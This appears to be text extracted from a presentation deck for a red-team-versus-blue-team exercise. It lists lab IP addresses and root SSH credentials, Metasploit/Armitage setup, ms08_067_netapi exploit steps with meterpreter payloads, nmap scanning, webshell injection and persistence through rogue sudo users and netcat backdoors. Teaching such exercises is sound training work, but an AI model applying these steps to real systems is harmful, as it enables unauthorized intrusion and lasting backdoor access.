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fastandeasyhacking.com/download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you need to start hacking the blue team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 andr01d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Windows xp: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>172.24.116.60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Windows XP Prp: 172.24.112.104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Ubuntu: 172.24.116.73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/>
              <a:t>Ssh creds: root, P@ssw0rd!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Fedora: 172.24.112.105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Virtual Machines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Use VMware Player/fusion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If you are CyberSec, you get all professional versions free!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 Linux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Kali Linux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Ubuntu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Any derivative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Install an .iso as a vm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Download and install VMware Player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Download your chosen linux .iso file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Create a New Virtual Machine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Select browse, choose your .iso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Next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Choose where you want to save the vm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Choose disk size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Consider how much you will use linux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Split virtual disk into multiple files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Install an iso...cont.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Customize Hardware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Choose the ammount of ram you want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Again consider how much you will use the vm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Choose how many processor cores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Decide between nat and bridged networking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I recommend bridged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Close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Finish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Using Armitage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Download Armitage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http://www.fastandeasyhacking.com/download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Download the .tar.gz version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Unzip wherever you want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Install the metasploit framework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Get it off the usb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Sudo apt-get install postgresql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Sudo service postgresql start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Cd to where you unpacked armitage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./armitage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Using metasploit alone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Sudo msfconsole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 search for exploits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Search keyword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 use a module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Use module/path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Options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Show options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Set OPTIONNAME whatever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exploit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Common exploits against Blue Team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SSH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TELNET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For win xp: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 metasploit framework: search ms08_067_netapi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Use exploits/windows/smb/ms08_067_netapi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For window xp sp1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Set PAYLOAD windows/meterpreter/reverse_tcp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For windows xp sp3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Set PAYLOAD windows/meterpreter/bind_tcp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Set LHOST 127.0.0.1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Set RHOST 172.24.116.60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Exploit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Exploring attack vectors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NMAP scan the allowed ip range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Useful nmap flags: nmap -O -sV -sS target.ip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 armitage if you want an overlay of possible exploits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Just click and drag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For Websites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Scan with tools like nikto, Vega, or any other web scanner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Look for possible webshells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Possibly inject a webshell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If all else fails, HAIL MARY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Persistence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Keeping access is important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Set up ssh key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Create arbitrary user, add to sudoers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Block other ip address’ from connecting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Set up persistent netcat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If you have a meterpreter set up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Makes it easy to set up netcat in the compromised machine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Open up a powershell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